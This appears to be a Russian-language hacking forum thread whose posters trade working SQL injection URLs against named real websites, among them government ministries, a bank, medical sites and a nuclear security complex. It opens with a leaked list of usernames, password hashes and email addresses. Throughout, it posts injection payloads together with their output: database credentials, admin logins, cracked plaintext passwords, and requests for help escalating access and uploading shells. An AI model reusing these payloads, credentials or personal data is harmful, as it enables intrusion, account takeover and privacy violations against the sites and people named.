asa/d744696db9cf57a74b7cba61daa3899c/alseal74@mail.ru/257957338.
clon/c5b2cebf15b205503560c4e8e6d1ea78/tigrenich@mail.ru.
deva/c5b2cebf15b205503560c4e8e6d1ea78/deva_80@bk.ru.
Jene4ka/633909fd73441abd86c2e934fe82b3aa/kitten@joker.botik.ru/110310110.
nata1/827ccb0eea8a706c4c34a16891f84e7b/nata1_77@bk.ru/.
Lena/04f8c854cb60b1b9f23cafe7501ccf79/superlenok1981@mail.ru.
Lidia/71b3b26aaa319e0cdf6fdb8429c112b0/lidia04@mail.ru.
ninok/c5b2cebf15b205503560c4e8e6d1ea78/ninok@list.ru.
Вера/c5b2cebf15b205503560c4e8e6d1ea78/svaga@bk.ru.
repic/c5b2cebf15b205503560c4e8e6d1ea78/repic@bk.ru.
Аяна/60d75b56ccd0786104966d0923c7e2f1/aynochka@yandex.ru.
isa/a8698009bce6d1b8c2128eddefc25aad/isaluk82@mail.ru.
Iricka/1c8d2ab0dceeab4ee9df6b408662dfc3/ir1976@rambler.ru.
алена/d70ebd4b4a1e63cbe210c5deb84866a0/samoshka25@mail.ru.
Tanya/040b7cf4a55014e185813e0644502ea9/tanya123@mail.ru/312780559.
E-dgin/a8e8a72b3a601405353123027f0aaf8a/e-dgin@yandex.ru/.
КОНТРА/900293ddcbf0e10d40732e5f2d41cdb5/kiut-red@mail.ru.
КОНТРОЛЕР/cc57497c5e0d93bab6b3ca140b33428a/kiut-red@mail.ru/.
Синяя роза/3f366c879a71e9ba217568f1d2a0a8c5/kiska_i@inbox.ru/.
Collins/a822c1b51da67e079bf1c461f85cb1cb/collins2004@list.ru/329017195.
дедушкин ТАБАК!!!!!!/4297f44b13955235245b2497399d7a93/kolaskin@mail.ru/111603986.
dolla®/4bc74efcbe25b1e867ef19a1f56872ca/djwax@imail.ru.
Dulcineya/4ed88732144d08f24d136825383759a0/doctor-65@mail.ru.
pilligrim/baf4d8a3668a117e64bb4881639826a7/pilligrim3000@mail.ru.
Konstantin/14dc0375ed631ce6f134abbf042fd845/zztopper@bk.ru.
Тайский/e10adc3949ba59abbe56e057f20f883e/andrey2332@yandex.ru/.
АНИКЕН/007769e839806c0a6376c5a18e4bd7a5/kit23@mail.ru.
ЭНИКЕН/cc57497c5e0d93bab6b3ca140b33428a/kit23@mail.ru.
БИ О/cc57497c5e0d93bab6b3ca140b33428a/kit23@mail.ru.
ЛО!/cc57497c5e0d93bab6b3ca140b33428a/lo@inbox.ru.
viola/e10adc3949ba59abbe56e057f20f883e/viola@wuw.ru.
Ш УРА/007769e839806c0a6376c5a18e4bd7a5/shura@mail.ru.
SHУРА/cc57497c5e0d93bab6b3ca140b33428a/shura@mail.ru.
ДИМОН 25/cc57497c5e0d93bab6b3ca140b33428a/ser@mail.ru.
МАКСВЕЛЛ/f343bfc68486ab3c37e9c3e4e151b277/cd-102@list.ru/202414832.
Miledy/633909fd73441abd86c2e934fe82b3aa/crazylisi4ka@bk.ru.
Black_Rose/a19e98b06127b9f0cce5e0d7a1851438/moth@pereslavl.ru/169378935.
ЖЕЛАННАЯ/a7d6985a6157a276a7d2d7e75e9aadec/katyshka17@mail.ru.
ЖЕЛАННАЯ/cc57497c5e0d93bab6b3ca140b33428a/katia15@mail.ru.
Nata/c68f1a64b81f32be5fd83587de848e89/nata@tm-net.ru.
sexygerl/827ccb0eea8a706c4c34a16891f84e7b/tigrenich@mail.ru.
Yulja/a4e28cb962c7595d2a06563521dce4d6/zuya@joker.botik.ru.
ГЕСС/cc57497c5e0d93bab6b3ca140b33428a/gess@mail.ru.
Алексей Сергеев/f497b7c74a361d9212acec1808a85918/sergeev71@mail.ru.
зайка/cc57497c5e0d93bab6b3ca140b33428a/zaiaka@mail.ru.
МАЛЬВИНА/e6c7c37b7b3982be6ec9328480f7130b/panda20@mail.ru.
ana/827ccb0eea8a706c4c34a16891f84e7b/natik555_05@mail.ru/.
Stasya/389861652a2f1a07a1074bd0727efe81/stasya@mail.ru/53407902.
Pesi/599481398359afbd99278929eb02f420/pesi@rambler.ru/.
LonelySoul/c39c35b146e4f2b8bd051f87ed702143/nadezhda83@yandex.ru/192811435.
helen/89e064f5b7ed7f3ad2def76de9375b69/helen14@land.ru.
saz5x/e10adc3949ba59abbe56e057f20f883e/saz5x@mail.ru.
гадя петрович хренова/cc57497c5e0d93bab6b3ca140b33428a/cd-102@mail.ru.
Убитый/e9fb2eda3d9c55a0d89c98d6c54b5b3e/nlv_1975@pochta.ru.
nawiht/ee3c517129c3af53d31ec4465dc3ebd0/nawiht@mail.ru/336587053.
Nik/baf22ddb7b1a317d860f48638254e2e9/ryabishkinav@mail.ru.
voron/bb9fbb5184689258492a7b9e308462c2/pritulo@rambler.ru.
OttO/81dc9bdb52d04dc20036dbd8313ed055/propk@rambler.ru.
ангело4ек/23804091115791b3b331fd1e1fa7355d/angelochek1989@mail.ru/268806236.
Alexander1/449a8249933eeeff8d5e192a10bba221/alexfom81@yahoo.com.
kostyan/f7c637636b330a0a350140173e0ee9e1/kpashkulsky@gmail.com.
ИРБИС/65609ad84147ff8dea5ad068c66a1447/leo.65@bk.ru.
*turklin*/a598fb9489bb74c48129214fc3f95c52/andy2032@yandex.ru.
Правовая защита и консалтинг/827ccb0eea8a706c4c34a16891f84e7b/mail@l-p-c.ru/.
Елена/555f2b90974eb8d447626037de2d4c18/00137@rambler.ru.
Екатерина/d93591bdf7860e1e4ee2fca799911215/00121@rambler.ru.
1megastar/f3f2dbe8093c29b9adda8b13ed45a06a/andy2032@narod.ru.
-kisa-/3bdf27c799f2a88ef2acd8148b0a6730/cats4me@narod.ru.
Darlinga/e10adc3949ba59abbe56e057f20f883e/os_revizor@mail.ru.
webmoneyjob/343b1c4a3ea721b2d640fc8700db0f36/webmoneyjob@yahoo.com.
*yan*/7219b9b60d9d70a9a7014369d88ebefe/andy2032@ya.ru.
Ada/a152e841783914146e4bcd4f39100686/love494@rambler.ru.
Девственница/cc57497c5e0d93bab6b3ca140b33428a/devstvennitsa90@mail.ru/.
ogqxeefb/700a9c6f1350c602633df5f8d682ca77/egenomgaul@zzheh.ru.
tvjaznx/8aa150a326ea92cdc8c427ddce5f7e8c/ykfujvd@odblcf.ru.
zlswpu/eddd10c5af29183c2f33b484f7fdeee7/ejsklotqn@ltufwyds.ru.
lqtmzopbtu/23e7640c6fc4a8864725d2591c7168df/fpxqkg@ljrjkjadrr.ru.
ocxlc/02812bd32dbf58e31b6d8bb328077be0/czhumtabyr@tuogia.ru.
tjflkycln/05fa3e07e8f3e69cf1fce3d0820e01cd/xmdayod@eqsonpiglt.ru.
ibiccju/e0e6795666966ddad025fa651d17c284/svlgnsgqqo@ngvurw.ru.
NUR/827ccb0eea8a706c4c34a16891f84e7b/allhobby@yandex.ru.
wbmco/3a9cd4fb04b65e7611a941c81d468898/mdmkoppfvs@gmslxemmu.ru.
mnpfnyddlw/4e7c8fb0c2fbe4e5b08e612fcb5386a4/kgpnmazp@ifywpkhx.ru.
ocrzecf/9f629790a33a632b73e073ea6760d4af/otynj@ygdxgqp.ru.
ndgnswryz/4dc2ca96bafc5e88169004dd1ebdc1bb/skvnrlcm@euepqiba.ru.
skjbfcgwqc/ffcba34286b1b73e37c7b4a85793e4c1/tjugg@fqpnoyqh.ru.
tehnyk3/e10adc3949ba59abbe56e057f20f883e/tehnyk3@mail.ru.
jyvdyly/9c6d6f61bfa71179977706739046bafc/flwdq@fwozo.ru.
bkhhus/30517df6d4910b09f49d86e82323ac45/hvfgrsk@bveeassmhv.ru.
myfduygp/62715d5a8e44894cd6486c9fe44a041a/didur@jgzcij.ru.
hewduiipd/f30c512e247edca62f39f84e6289d4ea/fdqokmamzu@gxndhu.ru.
xgatmbll/c2ae1896b1682440c04725cecada70a4/ermrog@hnpyfw.ru.
mssoft/e10adc3949ba59abbe56e057f20f883e/mssoft@bk.ru.
mdbgfqcb/240a2cc4464bc9038e9017a8a6722e82/vptcoymxe@uhuyo.ru.

4 база [cinema_accounts]
Name: Login: Password:
Артем Первин/versus/08616ab08c5f7c9bc9b08ff2e827c20b.
Дмитрий/Felix/81dc9bdb52d04dc20036dbd8313ed055.
Оксана/Oksana/d0dbe915091d400bd8ee7f27f0791303.
Сергей Алпаткин/asa/6885e793942458d3ba11f083f35d8178.

Румыния

mednews.ro - медицинаhttp://www.mednews.ro/arh.php?searchtype=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11/*&searchterm=a4.1.22-standard:mednews_mednews:mednews_mamb1@localhost (нижняя строка таблицы)
ФТП: ftp.mednews.ro

esp2000.ro - Electronica Azihttp://www.esp2000.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8/*4.0.27-log:electronicaazi:electronicaazi@localhost

interactiunietnice.rohttp://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7/*5.0.27-standard-log:interact_main:interact_root@localhost

51 таблица:http://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(table_n ame,0x71),0x71),4,5,6,7+from+information_schema.ta bles+limit+50,1/*Наша таба - phpbb_users - интересные поля:username,user_password,user_level,user_em ail,user_icq,user_website,user_aim,user_yim,user_m snm,user_occСловарики хилые, поэтому данные на админа только так [login:MD5(pass):email]:redactor:92a7593c6875ef1bdf0b4c779dd3efd6:redacti a@interactiunietnice.ro

Румыния ... как ни странно!

ms.ro - какое-то медицинское Министерство Румынииhttp://www.ms.ro/afis/pag.asp?idd=94&doi=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10/*5.0.27-community-max-nt:a_ms:ODBC@localhost

59 таблиц:decl_av
lst
lst_sc
men
men_bk
pghtml
viz2
viz2_old
vizms
bm
cat_caz
cat_indicator
cat_jud
cat_sectiune
date_jud
ape
ape_av
ape_comp
ape_comp_not
aviz
chimice
cosme
judete
nc_aprob
nc_aprob1
nc_aprob_r
not_cosm
not_cosm1
not_cosm_dbl
not_cosm_r
not_lab
not_lab_notif
not_lab_prod
notif
produs
scheme
sup_al
tari
discut
pro_disc
abilitari_notificari
abilitari_notificari_upload
activ_demnitariПо названиям таблиц - мало что понятно,
по названию полей в таблицах - ещё меньше... Вобщем заипался юзеров искать!
Кое-какие сведения юзеров встретил в табе notif

acta-cytol.com - журнал клинической цитологии и цитопатологии Румынииhttp://www.acta-cytol.com/toc/auto_abstract.php?id=-1+-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*4.0.13-nt:acta:acta_db@localhost

нашел в кладовке sql-inj на 604poker.com =)
http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(), 0x3a,version(),0x3a,database()),12,13,14,15/*604poker@localhost:5.0.24:604poker_comhttp://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(Host,0x 3a,User,0x3a,Password),12,13,14,15+from+mysql.user +limit+0,1/*localhost:root:392d71987544b253
mikethicke.com:root:392d71987544b253
66.84.13.133:root:392d71987544b253
%:root:392d71987544b253
localhost.localdomain:root:392d71987544b253
%:wikiuser:6509500e0c6c52c4 //пароль:d65k321
localhost.localdomain:wikiuser:6509500e0c6c52c4
%:604poker:392d71987544b253
localhost:604poker:392d71987544b253
:mike:5206044616733ec8
localhost:mike:5206044616733ec8
sga:5b24704e417d3f71 //пароль:terra2
localhost:sga:5b24704e417d3f71
localhost:h4w55262:392d71987544b253 //это впоследствии окажется логин к фтп =))http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(name,0x 3a,pass),12,13,14,15+from+604poker_com.dbusers+lim it+0,1/*admin:$1$Tmj.kF27$yqyJjREgZQ6/pydTRwET00http:// www.604poker.com/ adminadmin:76trew21http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(usernam e,0x3a,user_password,0x3a,user_email,0x3a,user_icq ),12,13,14,15+from+phpbb2_users+limit+1,1/*admin:36194e87e76797813435263e4cb2666e:linden16

Белвнешэкономбанк
http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71),3,4,5,6/*&DateStamp=2007-11-20%2000:00:00
А вот для входа юзеров там савсем другой сайтик.... интересно и там порыться но это уже другая история :)


http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,LOAD_FILE(char(47)),3,4,5,6%20fro m%20mysql.user/*&DateStamp=2007-11-20%2000:00:00

$DBhost="localhost";
$DBuser="vbank";
$DBpassword="Dilnak41";
$DBdatabase="bvebank";
$CommonResurseLocation = "http://217.23.115.9/";

коннект к мускулу возможен с любого хоста

user: vbank
host: %

таблицы.
bvebank (48)

balanc1
balance
balanceitem
bankfinnews
bankomat
bankomat_city
bankomat_users
banktitles
br1
br2
bv
cp
d_currency
d_filials
d_name
d_percent
d_stavki
d_users
filials_time_work
mainfinacts
mainfinactsarch
metalr1
metalr3
metalr4
metalr5
metalr6
metalr7
metalt1
metalt3
metalt4
metalt5
metalt6
metalt7
mt1
mt2
opros
opros1
opros2
partner
pmetals
property
propertyitem
revenue
revenueitem
sadmusers
subscribertasks
subscribeusers
users

Ахалай махалай рахат лукум sql-inj на vfs.com =)
собсно найдена она была давно... и на ней уже успел "поработать" какой-то сеошник =(
красивый вывод всех таблиц...http://www.vfs.com/faculty.php?id=-1+union+select+1,concat(table_name),3+from+informa tion_schema.tables/* http://www.vfs.com/faculty.php?id=-1+union+select+1,concat(auth_username,0x3a,auth_pa ssword),3+from+vfscom_db.auth_tbl/*stephen:261972f4500fa75a //пароль:eezy4u:
ccalnan:28f639a5162ecbb9
jderry:17fc2e8f0148bb35 //пароль:beb78e:
beata:0b097aa7659f8502
bbains:261972f4500fa75a //пароль:eezy4u:
studentservices:41acaf8f60411fc0
jennica:314f01b446e888ba
olambert:5a4e3a8648b173d6
mediateam:261972f4500fa75a //пароль:eezy4u:
lhenderson:261972f4500fa75a //пароль:eezy4u:
jbringsli:264f74d364088dd0
jmorris:61f5620c5a2c7c05
wtsang:659bab5b180b310chttp://www.vfs.com/robots.txtUser-agent: *
Disallow: /webtv/
Disallow: /webtv.php
Disallow: /index_down.html
Disallow: /htmlemail/
Disallow: /webs/
Disallow: /backend/ //админка

также там есть вордресс...

http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost

http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost
БД версия 4
Нашёл только w3t_Boards w3t_Posts
Хотя вру там учитывай регистр тебе не покажет w3t_user а w3t_User будет верно
т.е.
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+UNION+SELECT+1,2,3,4,5,6,7,8+FROM+w3t_Users/*
Полей пока не нашёл

https://www.cbil.upenn.edu/svn/gus/GusAppFramework/tags/DistribJob_release_1-0/Model/schema/oracle/users.sql
а тут что можно сделать?

Газетки почитать ..
http://www.trud.ru/issue/article.php?id=-200711212130102%20union%20select%201,2,3,name,5,pa ssword,7,8,9,10,11,12,13,14%20from%20forum.ibf_mem bers%20where%20id=1/*
в админке был..залить шел не удалось..чет там намудрил админ..

Тут погода ..типа ;)
http://news.gismeteo.ru/?newsitem=63331505902%20UNION%20select%201,2,3,4,5 ,6%20from%20news
..ничего не понял..т.е. че делать дальше не придумал

Банкир.ру ..
http://kurs.bankir.ru/index.php/abs/1/?v2=0&v1=170&fromd=23&fromm=10&fromy=2007&tod=-23'%20union%20select%201,2,3,version()/*&tom=11&toy=2007
Пятый мускул.. есть там чет типа админки, но только курсы валют подходят, до админки самого банкира (админ.банкир.ру) так и не добрался.. если есть в зале жуки майские, поднимите руку.

http://maryjane.ru - магазин футболок..
http://maryjane.ru/?action=reprintrequest&goodId=-16422'%20union%20select%201,2,3,4,5,version(),7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36/*
таблица юзерс..поле пассворд..да сами все пймете..
5.0.27

Министерство природных ресурсов российской федерации
http://www.mnr.gov.ru/part/?act=more&id=4409&pid=11+UNION+SELECT+concat(login,0x3a,password),2+ From+users+limit+1,1/*
БД версии 4
SANTIAGO:GAHAN200
ADMIN_CONT:WAS4CRF
ADMIN_NEWS:ADMKOMP
ADMIN_VODA:HGC3MK9S

ЕЕстония

www.kert.diip.ee

http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5+--+

4.1.22-standard-log:diip_kert@localhost:diip_kert

http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user_name,passwo rd),4,5+from+user+limit+0,1+--+

past:f16b82ee4c79ac26a8c8882cb2e7c525
niko:f42a0453acb448913db7ac8340b5b4f7
anc:e8a28a7ba22e61ddd16612b6d0d6947f
joe:539e53ab51366fccd762c14cfb4a4665
------------------------------------
86 пользователей

http://www.adapt.org/adaptpr/index.php?mode=P&id=-253+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3,4,5,6,7/*
www@localhost::archives::4.0.12-max
http://www.troc-velo.com/index.php?mode=1&annonce=-46890+union+select+concat_ws(char(58,58),user(),da tabase(),version()),2,3,4/*
webmaster@web.planet-work.net::webmaster::5.0.32-Debian_7etch1-l
89 таблиц

www.kromestudios.com

4.1.11-Debian_4sarge5-log

http://www.kromestudios.com/games/overview.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,AES_DE CRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES _ENCRYPT(password,0x71),0x71)),9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+mysql.user+--+

root:3da66bb67d498077
root:*33674D9ADE349AFD9256D9D109447C6F0540E387
:*33674D9ADE349AF
webmaster:0e1c10731366477a
web_bushrescue:76b68e694c41cbd4
sdb:273ff1036ed30d3f
kromeweb:772deb3439d64f29
web_bushrescue:
NOTQ:772deb3439d64f29
andygreen:7ca4c29d7375760c
kromeweb:*C8B0D9F346E669563013B3830EDB947F940930D9

http://www.hardxxxniche.com/reg.html
поле ввода кода:
123' or '5'='5
качаем на халяву))))))))))))

http://www.xxx-sexi.com ещё один=)
внизу первого сайта есть список рекомендумых сайтов, ходим по ним и ищем, что надо)))

http://www.zonewm.biz/showasf.php?id=4+union+select+1,version(),3,concat _ws(0x2F,id,pass),5,6,7,8,9+from+user/*

version: 4.1.22-standard-log

тока password т.к логины не подобрать

7252112e9937463288df35cc14b2cf74
4e8fed7ffd3b44ae492f8d306afff552
7252112e9937463288df35cc14b2cf74

http://axxl.ru/?module=do&part=full&id=-15976+union+select+1,concat_ws(0x2F,version(),data base(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

Version : 4.1.21/db_axxler_4/dbu_axxler_2@192.168.3.77

http://www.rating.vn.ua/stats.php?uid1=-489+union+select+1,version(),concat_ws(0x2F,id,nam e,password)+from+sites+limit+2,2/*

Version :5.0.15-standard

Типа что то связанное с админкой реклам...

ID сайт пароль

3/Сайт болельщиков ФК "Нива" Винница/hEaWFG
1/Рейтинг винницких сайтов/ifhsuby

www.seagullmag.com
Американский журнал на русском языке «Чайка» (Seagull magazine)
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11+--+
5.0.45:seagullmag@localhost:seagullmag
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat(table_schema,0x3a,table_na me),3,4,5,6,7,8,9,10,11+from+information_schema.co lumns+where+column_name=0x70617373776F7264+--+
seagullmag_forum:ibf_forums
http://www.seagullmag.com/article.php?id=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_schema= 0x73656167756C6C6D61675F666F72756D+and+table_name= 0x6962665F666F72756D73+limit+0,1+--+
id
name
password
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,id,name,password,d escription),3,4,5,6,7,8,9,10,11+from+seagullmag_fo rum.ibf_forums+limit+1,1+--+
Плюется чем-то очень страшным, вот пример первой записи:
-81:"Чайка" #22(81) от 15 ноября 2006 г.:
Пробовал так:AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71 )
и так:
convert(paasword+using+latin1)
Не помголо (

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок :D
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь? :confused: :confused: :confused:

ZAMUT
Это utf8. Пробуй convert(something+using+utf8)

http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+Email+FROM+v wWebUsers+WHERE+id='1')--

В качестве логина используется мыло, пароли в колонке PWD, далее увеличивая id перебираем всех пользователей

www.khemer.com Fun Online Games
http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5+--+
4.1.22-standard:khemer_fuHack@localhost:khemer_khmerdb

http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+users+limit+0,1+--+&page=0&ppage=20&order2=game_name&sby=ASC

Всего одна запись, как ни странно админ =) хэш сбручен.
toby:d85bf20bfaa9f65a051daa8d1c7214af:pehyuen
Авторизоваться тут:

http://www.khemer.com/login.php

http://www.worstpreviews.com/review.php?id=-168+union+select+version(),2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0/*
http://dvd.themanroom.com/dvd-review.php?id=-450+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8/*

http://www.fremontcountyinfo.com/review.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat_ ws(0x3a,userid,username,password),6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5+from+user/*
попробуйте до админа добраться

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок :D
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь? :confused: :confused: :confused:

Поможем Mike 007-му...)
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,concat_ws(0x3a,id,user,pass,mail) ,3,4,5+from+login+limit+1,1/*
Админка (зайти на смог)
http://www.polimernm.ru/admin/index.php

http://www.albarakat.ru/pubs.php?id_pubs=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*
Ищите админку и имена таблиц с колонками.

5taY3r
спасибо за помощь :D

http://www.imageland-pharma.ru/news.php?id=-1'+union+select+aes_decrypt(aes_encrypt(version(), 0x71),0x71),2,3,4,5/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full4.1.11 http://www.imageland-pharma.ru/news.php?id=-1'+union+select+concat(id,0x3a,name,0x3a,password, 0x3a,email),2,3,4,5+from+users/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full1:admin:RytGjKKh: попробуйте найти админку

http://www.macidol.com/review.php?id=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*

http://www.macidol.com/review.php?id=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*
хэш админа форума
-1+union+select+1,2,concat(username,0x3a,user_passw ord,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+ from+phpbb_users+limit+1,1/*
хэши, где длина колонки с icq равна 6 символам
-1+union+select+1,2,concat(username,0x3a,user_passw ord,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+ from+phpbb_users+where+length(user_icq)=6+limit+1, 1/*
Пример: mixedance2002:56e48939372812b306938bc0f4be770a:xan ax@online-drugs.com:442459

http://www.iks-navigator.ru/review.php?id=-1+union+select+1,concat(password,0x3a,user)+from+m ysql.user/*
7cfc33b574d442f6:root:gfhjkm
вопрос: как залогиниться?/

http://www.vdumu.net/review.php?id=-1'
:D
http://www.koln.ru/see.php?id=-265+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*

Мальдивы

www.visitmaldives.com

http://www.visitmaldives.com/ru/FAQ/faq.php?Id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5+--+

4.1.22-max-log:vmaldives@p3slhjavassl02.shr.phx3.secureserver .net:vmaldives

http://www.visitmaldives.com/ru/FAQ/faq.php?Id=-1+union+select+1,2,concat_ws(0x3a,name,password),4 ,5+from+users+limit+0,1+--+
MTPB:mtp307

Ayda.ru

скуля
http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16/*
login и pass админа
http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat( login,0x3a,psw),7,8,9,10,11,12,13,14,15,16+from+mk j_admin/*
login и пасс походу от сайта advalue.ru так как на одном хосте
http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat( login,0x3a,password),7,8,9,10,11,12,13,14,15,16+fr om+users/*

На этом я встал...
http://www.mai.ru/colleges/fac_9/k902/symp/razdel.php?id_razd=7'+and+1=0+UNION+SELECT+1,2,con cat_ws(0x3a,user(),database()),4,5,6,email+from+us ers+where+id="119"/*

помогите подобрать столбик с паролями пожалуйста ;)

На этом я встал...


помогите подобрать столбик с паролями пожалуйста ;)
http://www.mai.ru/colleges/fac_9/k902/symp/razdel.php?id_razd=7'+and+1=0+UNION+SELECT+1,2,con cat_ws(0x3a,login,psw),4,5,6,email+from+users+wher e%20+id=%22119%22/*
kaka123321123321:qwertyui
tdv:FdsuL45
Potapov:alexPOT
Kit:signal
flag:gikgik
Мерзляков:195021
Фрумен-СПбГМТУ:frfrfr
Gumer:160949
Kasyanov:vuy391y
julia:27011954
Юрий:sonovYP
SamsonovYP:03071948
и т.д
большиство пассов также подходит к мыльникам которые видны в инъекции
З.Ы очень приятная скуля)

http://www.kupitelefon.ru/model.php?Model=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12/*
mcc21:mcc21@localhost:4.0.24

http://www.shale.ru/page.php?lev1=5&lev2=-1+union+select+1,2,3,4,5,6,concat(database(),char( 58),user(),char(58),version()),8,9,10,11/*
db_shale01:shale01@localhost:4.0.24-standard

SQL-Inj:
http://superski.ru/adm/show.php?news_id=1193-1
http://superski.ru/adm/show.php?news_id=1193+order+by+7
http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,3,4,5,6,7
http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,concat_ws(0x3a,version(),use r()),4,5,6,7
5.0.45-log:u12761@10.10.223.222

f0rum ipb
http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,count(*),4,5,6,7+from+ipb_me mbers
4971 users
http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,concat_ws(0x3a,name,password ,email),4,5,6,7+from+ipb_members+where+id+like+0x3 1
admin:PassWord123

http://www.den-za-dnem.ru/page.php?article=%27-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8/*
dzd_den:dzd_den@localhost:4.1.22-standard

EEстония
http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,concat(table_schema,0x3a ,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27+from+information_schema.col umns+where+column_name=0x70617373776F7264+--+
gi:autokalender_users

http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,column_name,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr om+information_schema.columns+where+table_schema=0 x6769+and+table_name=0x6175746F6B616C656E6465725F7 573657273+limit+0,1+--+

uid
username
password
email

http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,concat_ws(0x3a,uid,usern ame,password,email),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27+from+gi.autokalender _users+limit+0,1+--+
1:admin:password:2:

www.linuxmint.com
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6+from+information_schema.columns+wh ere+column_name=0x70617373776F7264+limit+0,1/*
lms13:admin
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6+from+lms13.admin+limit+0,1/*
Пасс менялся несколько раз
clem:jolicoeur

The Y12 National Security Complex

www.y12.doe.gov
http://www.y12.doe.gov/news/release.php?id=30+union+select+1,2,3,4,concat_ws(0 x3a,version(),user(),database()),6,7,8,9,10+--+
5.0.33-log:y12admin@y12web4.y12.doe.gov:y12doegov
Дальше думаю разберетесь ;)

http://suvd.ru/news.php?id=-1+order+by+14/*
официальный сайт сочинской милиции
http://www.lacie.com.ru/product/mon.php?id=-30+union+select+1,2,3,4,5,6,database(),8,version() ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,user (),26,27,28,29,30,31,32,33,34,35,36,37,38/*
web@localhost
4.1.20-standard-log
http://trals.ru/1.php?id=-7+union+select+1,user(),3,4,5,6,7/*
tralsru5_u57649@localhost
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,concat(user,0x3a,pass),5,6,5+from +login/*
http://www.russned.ru/parts.php?ID=-1+order+by+5/*
:D :D :D

http://www.toofaced.com/ - что-то очень гламурное...

